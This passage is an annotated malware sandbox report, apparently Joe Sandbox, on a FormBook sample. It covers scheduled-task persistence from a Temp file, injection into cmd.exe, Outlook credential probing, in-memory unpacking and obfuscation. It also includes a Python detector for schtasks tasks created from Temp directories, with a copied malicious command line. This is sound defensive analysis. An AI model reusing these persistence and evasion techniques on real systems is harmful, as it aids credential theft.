- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Process created: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe {path}
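The schtasks command line above, a task created from an XML file in %TEMP%, is the pattern behind the "Scheduled temp file as task from temp location" Sigma hit listed at the top of this report. The following added example is mine, not the Sigma rule's own logic or anything from Joe Sandbox: it parses schtasks-style switches out of process-creation events and flags a `/Create` whose `/XML` path lies under AppData\Local\Temp or Windows\Temp. The events are constructed: the first copies this report's command line, the other two are invented benign contrast, and the field names parent/image/cmdline are an assumed event schema.

```python
import re

# Constructed process-creation events. The first is the command line from this
# report; the other two are made-up benign uses of schtasks for contrast.
EVENTS = [
    {"parent": r"C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JOOUCiAlE' "
                r"/XML 'C:\Users\user\AppData\Local\Temp\tmpB8CB.tmp'"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /Create /TN "Backup\Nightly" /XML "C:\ProgramData\Backup\nightly.xml"'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /Query /TN 'Updates\JOOUCiAlE'"},
]

# /Switch followed by an optional value in single quotes, double quotes, or bare.
# A value may not start with "/" so that "/Create /TN" yields two switches.
_ARG = re.compile(r"""/(\w+)(?:\s+(?:'([^']*)'|"([^"]*)"|((?!/)\S+)))?""", re.IGNORECASE)
_TEMP_DIR = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)


def parse_schtasks_args(cmdline: str) -> dict:
    """Return {switch_lowercase: value} for the /Switch value pairs in a command line."""
    args = {}
    for m in _ARG.finditer(cmdline):
        value = next((g for g in m.groups()[1:] if g is not None), "")
        args[m.group(1).lower()] = value
    return args


def flag_scheduled_task_from_temp(events):
    """Flag schtasks /Create calls whose task definition is read from a Temp directory."""
    hits = []
    for ev in events:
        if not ev["image"].lower().endswith("\\schtasks.exe"):
            continue
        args = parse_schtasks_args(ev["cmdline"])
        xml = args.get("xml")
        if "create" in args and xml and _TEMP_DIR.search(xml):
            hits.append({"parent": ev["parent"], "task": args.get("tn", ""), "xml": xml})
    return hits


if __name__ == "__main__":
    for hit in flag_scheduled_task_from_temp(EVENTS):
        print(f"{hit['parent']} created task {hit['task']} from {hit['xml']}")
```

The parent image is kept in each hit because, in this report, the parent was an executable launched from the user's Desktop rather than an installer or management agent; that is the field an analyst would pivot on next.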
Uses an in-process (OLE) Automation server

- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Writes ini files

- Source: C:\Windows\SysWOW64\cmd.exe File written: C:\Users\user\AppData\Roaming\L6725004\L67logri.ini

The writer is cmd.exe, the process the payload injected into (its memory dumps, 0000000D, matched the FormBook rules above), so the randomly named directory under AppData\Roaming is the payload's own working directory rather than anything cmd.exe does on its own.

Uses Microsoft Silverlight

- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

The evidence is the .NET Framework 2.0 runtime resource library (mscorrc.dll), which any .NET 2.0 application loads; nothing in this report shows a Silverlight component, so the signature label is misleading.

Checks if Microsoft Office is installed

- Source: C:\Windows\SysWOW64\cmd.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

The key is the Outlook 2013 (Office 15.0) profile store, opened from the injected cmd.exe; this fits the "Tries to steal Mail credentials" signature above rather than an innocent Office version check.

PE file contains a COM descriptor data directory

- Source: uVSV3amss8eu5Sr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Uses new MSVCR Dlls

- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Contains modern PE file flags such as dynamic base (ASLR) or NX

- Source: uVSV3amss8eu5Sr.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

PE file contains a debug data directory

- Source: uVSV3amss8eu5Sr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

None of these name the sample's own build: wntdll.pdb, cmd.pdb, wscui.pdb and mscorrc.pdb belong to Windows and .NET system modules mapped into the dumped processes.

- Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.393792249.0000000007640000.00000002.00000001.sdmp
- Source: Binary string: wntdll.pdbUGP source: uVSV3amss8eu5Sr.exe, 00000003.00000002.430274667.0000000001940000.00000040.00000001.sdmp, cmd.exe, 0000000D.00000002.620999075.0000000002DD0000.00000040.00000001.sdmp
- Source: Binary string: cmd.pdbUGP source: uVSV3amss8eu5Sr.exe, 00000003.00000002.430741082.0000000001D60000.00000040.00000001.sdmp
- Source: Binary string: wntdll.pdb source: uVSV3amss8eu5Sr.exe, cmd.exe
- Source: Binary string: cmd.pdb source: uVSV3amss8eu5Sr.exe, 00000003.00000002.430741082.0000000001D60000.00000040.00000001.sdmp
- Source: Binary string: mscorrc.pdb source: uVSV3amss8eu5Sr.exe, 00000000.00000002.379292234.0000000006290000.00000002.00000001.sdmp
- Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.393792249.0000000007640000.00000002.00000001.sdmp

### Data Obfuscation:

.NET source code contains potential unpacker

Assembly.Load(byte[]) in MacroReader.cs loads the next stage from a byte array in memory without touching disk; the same method is present in the dropped JOOUCiAlE.exe, i.e. the dropped file carries the same loader.

- Source: uVSV3amss8eu5Sr.exe, MacroReader.cs .Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
- Source: JOOUCiAlE.exe.0.dr, MacroReader.cs .Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
- Source: 0.2.uVSV3amss8eu5Sr.exe.160000.0.unpack, MacroReader.cs .Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
- Source: 0.0.uVSV3amss8eu5Sr.exe.160000.0.unpack, MacroReader.cs .Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
- Source: 3.2.uVSV3amss8eu5Sr.exe.f50000.1.unpack, MacroReader.cs .Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
- Source: 3.0.uVSV3amss8eu5Sr.exe.f50000.0.unpack, MacroReader.cs .Net Code: M__________ System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Binary contains a suspicious time stamp

- Source: initial sample Static PE information: 0xC69EE47B [Tue Aug 6 07:25:47 2075 UTC]

A link time in 2075 cannot be genuine; the TimeDateStamp field has been overwritten or generated by the build tooling.

Uses code obfuscation techniques (call, push, ret)

- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0041CDF5 push eax; ret 3_2_0041CE48
- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0041CE42 push eax; ret 3_2_0041CE48
- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0041CE4B push eax; ret 3_2_0041CEB2
- Source: C:\Users\user\Desktop\uVSV3amss8eu5Sr.exe Code function: 3_2_0041CEAC push eax; ret 3_2_0041CEB2
- Source: